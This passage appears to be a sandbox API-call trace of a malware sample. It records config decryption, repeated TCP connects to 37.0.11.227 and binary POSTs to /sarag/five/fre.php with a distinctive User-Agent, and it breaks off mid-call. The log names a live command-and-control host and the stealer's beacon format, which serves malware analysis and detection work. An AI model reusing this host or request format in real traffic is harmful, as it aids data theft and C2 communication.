[0255.617] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0255.617] GetProcessHeap () returned 0x690000 [0255.617] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4a0 [0255.617] socket (af=2, type=1, protocol=6) returned 0x748 [0255.617] connect (s=0x748, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0255.650] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0255.650] GetProcessHeap () returned 0x690000 [0255.650] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0255.650] GetProcessHeap () returned 0x690000 [0255.650] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0255.651] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0255.651] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0255.651] GetProcessHeap () returned 0x690000 [0255.651] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b01c0 [0255.652] GetProcessHeap () returned 0x690000 [0255.652] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0255.652] GetProcessHeap () returned 0x690000 [0255.652] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0255.652] GetProcessHeap () returned 0x690000 [0255.652] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0255.653] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0255.654] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0255.654] GetProcessHeap () returned 0x690000 [0255.654] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0255.654] GetProcessHeap () returned 0x690000 [0255.655] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0255.656] send (s=0x748, buf=0x6ad508*, len=242, flags=0) returned 242 [0255.657] send (s=0x748, buf=0x6aba40*, len=159, flags=0) returned 159 [0255.657] GetProcessHeap () returned 0x690000 [0255.657] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0255.657] recv (in: s=0x748, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0255.741] GetProcessHeap () returned 0x690000 [0255.742] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0255.742] GetProcessHeap () returned 0x690000 [0255.743] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0255.743] GetProcessHeap () returned 0x690000 [0255.743] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b01c0 | out: hHeap=0x690000) returned 1 [0255.744] GetProcessHeap () returned 0x690000 [0255.744] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0255.744] closesocket (s=0x748) returned 0 [0255.750] GetProcessHeap () returned 0x690000 [0255.750] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4a0 | out: hHeap=0x690000) returned 1 [0255.750] GetProcessHeap () returned 0x690000 [0255.750] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0255.750] GetProcessHeap () returned 0x690000 [0255.751] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0255.751] GetProcessHeap () returned 0x690000 [0255.752] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0255.752] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14e4) returned 0x748 [0255.755] Sleep (dwMilliseconds=0xea60) [0255.756] GetProcessHeap () returned 0x690000 [0255.756] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0255.757] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.758] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0255.770] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.770] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0255.776] GetProcessHeap () returned 0x690000 [0255.776] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0255.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.777] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0255.777] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.778] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0255.780] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.780] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0255.780] GetProcessHeap () returned 0x690000 [0255.781] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0255.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.782] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0255.786] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.787] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0255.787] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.787] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0255.787] GetProcessHeap () returned 0x690000 [0255.787] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0255.788] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.788] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0255.791] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.791] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0255.792] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.792] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0255.792] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.793] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0255.793] GetProcessHeap () returned 0x690000 [0255.793] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0255.793] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0255.793] GetProcessHeap () returned 0x690000 [0255.794] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0255.794] GetProcessHeap () returned 0x690000 [0255.794] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0255.794] GetProcessHeap () returned 0x690000 [0255.794] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0255.794] GetProcessHeap () returned 0x690000 [0255.794] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0255.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.795] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0255.799] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.800] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0255.805] GetProcessHeap () returned 0x690000 [0255.805] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0255.806] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.806] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0255.807] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.807] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0255.808] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.808] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0255.808] GetProcessHeap () returned 0x690000 [0255.808] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0255.809] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.809] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0255.810] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.810] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0255.811] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.811] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0255.811] GetProcessHeap () returned 0x690000 [0255.811] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0255.812] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.814] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0255.815] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.815] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0255.816] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.816] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0255.817] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.818] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0255.818] GetProcessHeap () returned 0x690000 [0255.818] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0255.818] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0255.818] GetProcessHeap () returned 0x690000 [0255.818] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4f0 [0255.818] socket (af=2, type=1, protocol=6) returned 0x74c [0255.818] connect (s=0x74c, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0255.843] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0255.843] GetProcessHeap () returned 0x690000 [0255.843] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aee58 [0255.843] GetProcessHeap () returned 0x690000 [0255.843] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0255.844] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0255.847] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0255.847] GetProcessHeap () returned 0x690000 [0255.847] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afec0 [0255.848] GetProcessHeap () returned 0x690000 [0255.848] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0255.848] GetProcessHeap () returned 0x690000 [0255.848] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0255.848] GetProcessHeap () returned 0x690000 [0255.848] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0255.849] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0255.850] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0255.850] GetProcessHeap () returned 0x690000 [0255.850] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0255.850] GetProcessHeap () returned 0x690000 [0255.851] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0255.851] send (s=0x74c, buf=0x6ad508*, len=242, flags=0) returned 242 [0255.852] send (s=0x74c, buf=0x6aba40*, len=159, flags=0) returned 159 [0255.852] GetProcessHeap () returned 0x690000 [0255.852] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0255.852] recv (in: s=0x74c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0255.922] GetProcessHeap () returned 0x690000 [0255.923] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0255.923] GetProcessHeap () returned 0x690000 [0255.923] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0255.923] GetProcessHeap () returned 0x690000 [0255.923] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afec0 | out: hHeap=0x690000) returned 1 [0255.923] GetProcessHeap () returned 0x690000 [0255.924] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aee58 | out: hHeap=0x690000) returned 1 [0255.924] closesocket (s=0x74c) returned 0 [0255.924] GetProcessHeap () returned 0x690000 [0255.925] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4f0 | out: hHeap=0x690000) returned 1 [0255.925] GetProcessHeap () returned 0x690000 [0255.925] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0255.925] GetProcessHeap () returned 0x690000 [0255.925] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0255.926] GetProcessHeap () returned 0x690000 [0255.926] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0255.926] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14e8) returned 0x74c [0255.928] Sleep (dwMilliseconds=0xea60) [0255.929] GetProcessHeap () returned 0x690000 [0255.929] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0255.929] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.930] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0255.937] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.937] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0255.943] GetProcessHeap () returned 0x690000 [0255.943] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0255.945] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.946] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0255.946] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.947] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0255.947] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.947] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0255.947] GetProcessHeap () returned 0x690000 [0255.948] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0255.949] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.949] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0255.950] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.951] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0255.951] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.952] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0255.952] GetProcessHeap () returned 0x690000 [0255.952] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0255.952] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.952] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0255.953] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.953] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0255.954] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.954] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0255.956] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.957] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0255.957] GetProcessHeap () returned 0x690000 [0255.957] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0255.957] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0255.957] GetProcessHeap () returned 0x690000 [0255.957] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0255.957] GetProcessHeap () returned 0x690000 [0255.958] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0255.958] GetProcessHeap () returned 0x690000 [0255.958] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0255.958] GetProcessHeap () returned 0x690000 [0255.958] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0255.959] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.959] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0255.970] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.970] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0255.978] GetProcessHeap () returned 0x690000 [0255.978] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0255.979] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.979] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0255.979] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.980] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0255.980] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.981] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0255.981] GetProcessHeap () returned 0x690000 [0255.981] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0255.982] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.982] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0255.983] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.983] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0255.984] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.984] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0255.984] GetProcessHeap () returned 0x690000 [0255.984] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0255.985] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.985] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0255.986] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.986] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0255.987] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.987] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0255.990] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.990] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0255.990] GetProcessHeap () returned 0x690000 [0255.990] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0255.990] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0255.990] GetProcessHeap () returned 0x690000 [0255.990] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab490 [0255.990] socket (af=2, type=1, protocol=6) returned 0x750 [0255.991] connect (s=0x750, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0256.025] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0256.025] GetProcessHeap () returned 0x690000 [0256.025] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aed48 [0256.025] GetProcessHeap () returned 0x690000 [0256.025] RtlAllocateHeap (HeapHandle=0x690000, 